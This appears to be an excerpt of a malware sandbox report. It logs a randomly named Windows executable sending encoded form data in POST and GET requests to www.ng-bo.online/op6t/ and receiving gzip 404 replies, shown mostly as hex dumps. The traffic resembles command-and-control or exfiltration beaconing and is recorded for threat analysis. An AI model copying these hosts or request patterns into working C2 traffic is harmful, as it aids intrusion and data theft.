                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:36:23.027848005 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:36:23.375714064 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        55192.168.11.304985137.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:25.526063919 CEST776OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 75 34 57 49 6d 6e 30 4e 45 5a 41 53 2f 34 49 69 32 66 56 39 77 74 36 64 63 59 49 50 78 76 5a 4d 46 57 6a 71 6a 66 63 70 71 79 78 45 5a 62 78 77 72 66 70 62 45 47 59 70 42 45 79 4b 73 36 41 65 75 77 6f 56 51 75 59 58 78 6e 69 55 6c 4f 38 66 66 49 58 47 6e 67 76 41 47 68 4f 50 76 58 57 77 6b 58 59 74 2f 53 53 62 5a 74 2b 4c 35 71 79 7a 59 5a 78 32 56 2f 4c 34 57 47 55 59 4e 41 51 6f 32 69 30 4d 70 35 35 66 59 61 4d 56 4e 73 4e 58 70 6c 65 41 39 6b 70 58 43 41 70 2b 35 6c 7a 42 54 6b 5a 74 33 38 65 73 43 69 35 6a 57 52 6f 45 34 4b 57 37 51 72 35 59 57 2b 76 48 4f 6f 57 34 72 33 44 71 57 50 65 75 61 59 3d
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxvZMFWjqjfcpqyxEZbxwrfpbEGYpBEyKs6AeuwoVQuYXxniUlO8ffIXGngvAGhOPvXWwkXYt/SSbZt+L5qyzYZx2V/L4WGUYNAQo2i0Mp55fYaMVNsNXpleA9kpXCAp+5lzBTkZt38esCi5jWRoE4KW7Qr5YW+vHOoW4r3DqWPeuaY=
                                                                        May 22, 2024 17:36:25.902326107 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:36:25.902354002 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:36:25.902601004 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:36:25.902751923 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:36:25.903001070 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:36:25.903017044 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:36:25.903295040 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:36:25.903402090 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:36:25.903666019 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:36:25.903703928 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:36:26.251102924 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        56192.168.11.304985237.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:28.400497913 CEST1693OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 64 44 73 65 56 30 78 47 71 49 51 39 74 75 34 57 49 6d 6e 30 4e 45 5a 41 53 2f 34 49 69 32 66 56 39 77 74 36 64 63 59 49 50 78 6e 5a 4e 30 32 6a 37 77 6e 63 71 71 79 78 48 5a 62 30 77 72 66 6f 62 41 71 63 70 42 42 48 4b 70 32 41 66 4e 6f 6f 64 45 79 59 43 68 6e 69 59 46 4f 39 42 76 49 4f 47 6e 77 6a 41 47 78 4f 50 76 58 57 77 69 62 59 71 75 53 53 5a 5a 74 2f 4b 35 71 41 6b 6f 5a 4a 32 56 6e 78 34 57 53 75 59 65 59 51 72 57 53 30 4f 61 42 35 44 49 61 4f 59 74 74 51 58 70 68 42 41 39 34 66 58 42 63 58 2b 37 6c 7a 53 30 6b 50 34 58 41 46 2f 67 71 6b 67 45 74 2f 43 35 71 44 6d 52 72 5a 56 47 6d 44 4f 73 59 64 2b 36 43 66 7a 6b 71 64 30 39 6d 58 58 35 31 32 45 72 75 50 55 52 5a 6e 7a 75 72 52 32 61 4e 77 57 6b 64 68 66 37 65 7a 36 59 35 65 69 6b 4b 33 35 75 32 39 44 64 69 6b 6b 53 52 69 39 43 4c 46 35 2b 41 32 64 35 66 70 48 65 4d 52 32 6a 34 58 51 4c 2f 2b 64 74 62 2f 6b 43 33 64 63 53 52 50 6d 50 6e 47 5a 61 65 4b 7a 43 74 51 56 77 5a 42 4d 57 4d 66 49 6a 38 7a 2f 79 4f 6b 77 4b 33 54 [TRUNCATED]
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxnZN02j7wncqqyxHZb0wrfobAqcpBBHKp2AfNoodEyYChniYFO9BvIOGnwjAGxOPvXWwibYquSSZZt/K5qAkoZJ2Vnx4WSuYeYQrWS0OaB5DIaOYttQXphBA94fXBcX+7lzS0kP4XAF/gqkgEt/C5qDmRrZVGmDOsYd+6Cfzkqd09mXX512EruPURZnzurR2aNwWkdhf7ez6Y5eikK35u29DdikkSRi9CLF5+A2d5fpHeMR2j4XQL/+dtb/kC3dcSRPmPnGZaeKzCtQVwZBMWMfIj8z/yOkwK3To6eQ5dBT/+Xyx70wCW3auAWNyCNOuZ/9tEZdrhFLcOmn83VdqHqjCfHiCALB9np+XBG7IbFUR5HDhxe478Pg2wUnX1KSJmo63Qnk61RQmNRd8SgBHbDdLPFH4IVNdiBGrObfE05UtdC0X+LwB5jLrHoKvphTLXtdrD8IV4+W4A65S745V53dfzsZsrVXmfqCvJ8+wynXUj+Z5hpo9cDo7jlesl7Y1JQIpCkTuAAIln8tOu073D/WfB2Pt8q93LxMEp5k6YyX4Cc1iknISR3FmgepcxP0who5uvUZ8L2I0ysEK3oMt9EzCptY3P+GimNyxIu5ipMgfygWQc+tttLoDP6Ysijx4yyyenwCQNyWP3TYAiQdPuxMyBKAauUm0uZVxxfki0cVxFPBtcioKvUq7LhlbS7seHjg1uIDOwmoiuE/+mkpTXCjd2PIkV46jHggmASyoRjwcl+KVBrIXIvPg6Ra1g3qsitLejX2rHX5pu6unrkCdunogmkpU2JcqFHTkIrFEnBFWqhF12mf+l19isz0GGLM2+CVlAqPNImVnUPgXGr7/NS4UjXPN/XB4qJKqGSYqVGvykPqTDKoGYyUdSnvepB50lWRh8HpwtygANN1ge+Cs3b469UIX+MzKEJk/dGtt0nTImRDb5tkGGxU/xqE4NU/okBxKP [TRUNCATED]
                                                                        May 22, 2024 17:36:28.770644903 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:36:28.770659924 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:36:28.770900965 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:36:28.770915031 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:36:28.771394014 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:36:28.771409035 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:36:28.771574020 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:36:28.771684885 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:36:28.771804094 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:36:28.771944046 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:36:29.119728088 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        57192.168.11.304985337.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:36:31.276565075 CEST485OUTGET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.ng-bo.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:31.646790028 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:31 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
